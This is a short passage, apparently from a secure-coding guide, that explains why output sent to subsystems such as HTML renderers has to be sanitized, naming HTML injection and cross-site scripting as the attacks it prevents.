...
Several subsystems exist for the purpose of showing output. An HTML renderer, as part of a web browser, is one common subsystem for displaying output. Data sent to an output subsystem may appear to originate from a trusted source; consequently, it is tempting to assume that output sanitization is unnecessary. However, data sent to an output subsystem may indirectly originate from an untrusted source and may include malicious content. Failure to properly sanitize data for output subsystems can enable several types of attacks. For example, HTML renderers can be prone to HTML injection and cross-site scripting (XSS) [OWASP 2011] attacks. ( Note, however, that the term cross-site scripting attack is generally applied to such attacks even when they involve only one site. ) Output sanitization to prevent such attacks is as vital as input sanitization.
...